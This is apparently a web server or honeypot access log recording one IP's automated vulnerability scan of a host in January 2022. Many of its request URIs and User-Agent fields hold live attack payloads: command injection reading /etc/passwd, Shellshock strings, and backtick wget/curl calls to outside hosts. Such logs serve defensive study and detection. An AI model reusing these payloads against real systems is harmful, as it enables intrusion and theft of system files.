| timestamp | ip | host | browser | uri |
|---|
| 20220127-18:31:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27 |
| 20220127-18:32:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /owa/auth/x.js |
| 20220127-18:32:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /user.action |
| 20220127-18:32:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 |
| 20220127-18:32:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /tests/support/stores/test_grid_filter.php?query=phpinfo(); |
| 20220127-18:32:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | https://54.89.6.87/diag_ping_admin_en.asp |
| 20220127-18:32:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | https://54.89.6.87/index.htmlr |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /actuator/env |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | https://54.89.6.87/login.shtml |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /mailingupgrade.php |
| 20220127-18:32:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /context.json |
| 20220127-18:32:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /cgi-bin/mt/mt-xmlrpc.cgi |
| 20220127-18:32:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 20220127-18:32:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /wls-wsat/CoordinatorPortType |
| 20220127-18:32:17 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /EemAdminService/EemAdmin |
| 20220127-18:32:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /cgi-bin/system_mgr.cgi? |
| 20220127-18:32:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget |
| 20220127-18:33:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | https://54.89.6.87/webadmin/admin/service_manager_data.php |
| 20220127-18:33:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | https://54.89.6.87/webadmin/admin/service_manager_data.php |
| 20220127-18:33:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 |
| 20220127-18:33:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /nuclei.txt |
| 20220127-18:33:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /servlet/UploadServlet |
| 20220127-18:33:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /lcms/index.php |
| 20220127-18:35:49 | 45.15.19.130 | 45.15.19.130 | () { :; }; echo ; echo ; /bin/cat /etc/passwd | /cgi-bin/slogin/login.py |
| 20220127-18:36:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /webmail/basic/ |
| 20220127-18:36:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:36:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING |
| 20220127-18:36:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /ucmdb-api/connect |
| 20220127-18:36:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /secure/ContactAdministrators!default.jspa |
| 20220127-18:36:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json |
| 20220127-18:36:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 |
| 20220127-18:37:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /storfs-asup |
| 20220127-18:37:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /include/makecvs.php?Event=%60wget%20http%3A%2F%2F%60 |
| 20220127-18:38:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F%60 |
| 20220127-18:38:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /website/blog/ |
| 20220127-18:38:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /_search |
| 20220127-18:38:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /invoker/JMXInvokerServlet/ |
| 20220127-18:38:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /invoker/EJBInvokerServlet/ |
| 20220127-18:38:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /guest_auth/guestIsUp.php |
| 20220127-18:38:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /guest_auth/poc.php?cmd=cat%20/etc/passwd |
| 20220127-18:39:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /integration/saveGangster.action |
| 20220127-18:39:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /pages/systemcall.php?command=cat%20/etc/passwd |
| 20220127-18:39:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /wsman |
| 20220127-18:39:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /cgi/networkDiag.cgi |
| 20220127-18:40:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 |
| 20220127-18:40:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /wp-admin/admin-ajax.php |
| 20220127-18:40:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /login.htm |
| 20220127-18:40:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:40:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /wp-content/uploads/workreap-temp/24IBLYnyDILr28C9xkIyqB7QIs7.php |
| 20220127-18:40:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; |
| 20220127-18:40:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /service/extdirect |
| 20220127-18:40:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 |
| 20220127-18:40:57 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; |
| 20220127-18:41:18 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /wp-content/plugins/simple-file-list/ee-upload-engine.php |
| 20220127-18:41:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /wp-content/plugins/simple-file-list/ee-file-engine.php |
| 20220127-18:41:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /wp-content/uploads/simple-file-list/nuclei.php |
| 20220127-18:41:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 |
| 20220127-18:41:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users |
| 20220127-18:43:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php |
| 20220127-18:43:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /v2/query |
| 20220127-18:43:43 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /./RestAPI/LogonCustomization |
| 20220127-18:43:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /./RestAPI/LogonCustomization |
| 20220127-18:43:48 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /./RestAPI/Connection |
| 20220127-18:43:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /help/admin-guide/test.jsp |
| 20220127-18:43:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /run |
| 20220127-18:44:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /php/ping.php |
| 20220127-18:45:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /cgi-bin/login.cgi |
| 20220127-18:45:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /script/ |
| 20220127-18:46:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| 20220127-18:46:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| 20220127-18:46:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /ajax/networking/get_netcfg.php?iface=;curl%20http:///`whoami`; |
| 20220127-18:46:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /auth/change |
| 20220127-18:46:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /auth |
| 20220127-18:46:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /api/timelion/run |
| 20220127-18:46:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt |
| 20220127-18:46:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /include/nuclei.txt |
| 20220127-18:47:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | 54.89.6.87/user/register |
| 20220127-18:47:27 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /web.config.i18n.ashx?l=nuclei&v=nuclei |
| 20220127-18:47:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /login.php |
| 20220127-18:48:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:48:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | https://54.89.6.87/login_pic.asp |
| 20220127-18:48:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | https://54.89.6.87/login_pic.asp |
| 20220127-18:49:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com |
| 20220127-18:49:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com |
| 20220127-18:49:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /mgmt/shared/authn/login |
| 20220127-18:49:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /mgmt/tm/util/bash |
| 20220127-18:49:18 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:25 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:27 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /debug.php |
| 20220127-18:49:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png |
| 20220127-18:49:53 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
| 20220127-18:49:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
| 20220127-18:49:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /objects/nuclei.txt |
| 20220127-18:50:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /ui/vropspluginui/rest/services/getstatus |
| 20220127-18:50:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /wp-content/plugins/contact-form-7/readme.txt |
| 20220127-18:50:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; |
| 20220127-18:50:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /upload |
| 20220127-18:50:30 | 45.15.19.130 | 45.15.19.130 | "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'","/cgi-bin/jarrewrite.sh | NULL |
| 20220127-18:50:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /_async/AsyncResponseService |
